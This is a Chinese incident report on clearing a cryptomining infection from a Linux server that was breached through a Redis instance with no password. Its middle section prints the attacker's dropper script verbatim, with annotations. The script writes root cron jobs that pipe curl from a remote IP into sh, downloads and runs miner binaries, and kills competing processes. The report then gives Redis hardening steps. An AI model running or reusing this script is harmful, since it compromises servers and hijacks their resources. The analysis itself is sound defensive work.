1. 用 top 命令查看哪些進程耗費資源；發現兩個異常進程
Paste_Image.png
2. ps -ef 查看進程源文件
Paste_Image.png
3. 關閉進程，找到源文件並刪除
Paste_Image.png
4. 最後發現一個遠程的病毒腳本
# --- Captured dropper script (incident sample, reproduced verbatim for analysis) ---
# The lines below are the attacker's code, not a script to run. Annotations describe
# what each step does so the artefacts it leaves can be found and removed.
#
# PATH is widened so the tools used below resolve even from a minimal cron/redis environment.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Persistence: overwrites root's crontab so the remote stage-1 script is re-fetched and
# re-executed every 5 minutes. Note the ">" — any legitimate root cron entries are destroyed.
# Remediation: this cron file must be removed/restored, otherwise the miner returns after cleanup.
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/root
# Same persistence written to the second crontab location used by some distributions.
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/crontabs/root
# Payload download: fetched only if the dropped file is absent; the filename embeds the
# machine architecture from uname -m. IoC on disk: /tmp/ddg.1001.
if [ ! -f "/tmp/ddg.1001" ]; then
curl -fsSL http://104.131.145.109/1001/ddg.$(uname -m) -o /tmp/ddg.1001
fi
# Executes the dropped binary (the process seen consuming CPU in step 1).
chmod +x /tmp/ddg.1001 && /tmp/ddg.1001
#######################################
# Kills every process whose command line matches one of the listed strings
# (grep -v grep excludes the grep itself; awk picks the PID column; kill -9).
# The patterns look like other miners / mining-pool hostnames, so this appears
# to be the attacker removing competing malware rather than hiding — which is
# also why these names are useful indicators when reviewing `ps` output.
# NOTE: this function is defined but never called in the sample as captured.
# Globals:   none
# Arguments: none
# Returns:   status of the last pipeline
#######################################
CleanTail()
{
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}
#######################################
# Second-stage payload: downloads /tmp/wnTKYg from the same C2 host if it is not
# already present, marks it executable and runs it.
# Disk IoC: /tmp/wnTKYg. Network IoC: http://104.131.145.109/wnTKYg
# Globals:   none
# Arguments: none
# Returns:   status of the executed binary
#######################################
DoTKY()
{
if [ ! -f "/tmp/wnTKYg" ]; then
curl -fsSL http://104.131.145.109/wnTKYg -o /tmp/wnTKYg
fi
chmod +x /tmp/wnTKYg
/tmp/wnTKYg
}
#######################################
# Fallback variant of DoTKY using a differently named payload (".noaes" — presumably
# a build for CPUs without AES instructions; inferred from the name only).
# Disk IoC: /tmp/wnTKYg.noaes. Network IoC: http://104.131.145.109/wnTKYg.noaes
# Globals:   none
# Arguments: none
# Returns:   status of the executed binary
#######################################
DoTKYnoAES()
{
if [ ! -f "/tmp/wnTKYg.noaes" ]; then
curl -fsSL http://104.131.145.109/wnTKYg.noaes -o /tmp/wnTKYg.noaes
fi
chmod +x /tmp/wnTKYg.noaes
/tmp/wnTKYg.noaes
}
# Kills any process matching "AnXqV" (another process-name indicator worth checking).
ps auxf|grep -v grep|grep "AnXqV"|awk '{print $2}'|xargs kill -9
# Watchdog: if no "wnTKYg" process is running, (re)launch it — first the default build,
# then the noaes build. Combined with the 5-minute cron above this is why killing the
# process alone (step 3) is not sufficient; the cron entries and /tmp files must go too.
ps auxf|grep -v grep|grep "wnTKYg" || DoTKY
ps auxf|grep -v grep|grep "wnTKYg" || DoTKYnoAES
5. 事故原因
網上搜索後得知是 redis 的一個漏洞，主要利用 redis 安裝後沒有設置密碼和沒有限制登錄來源，使用
redis-cli -h IP 就可以直接遠程登錄 redis
6. 解決方法
1. 設置 redis 密碼
2. 限制遠程登錄的來源 IP
3. 不使用 root 用戶運行 redis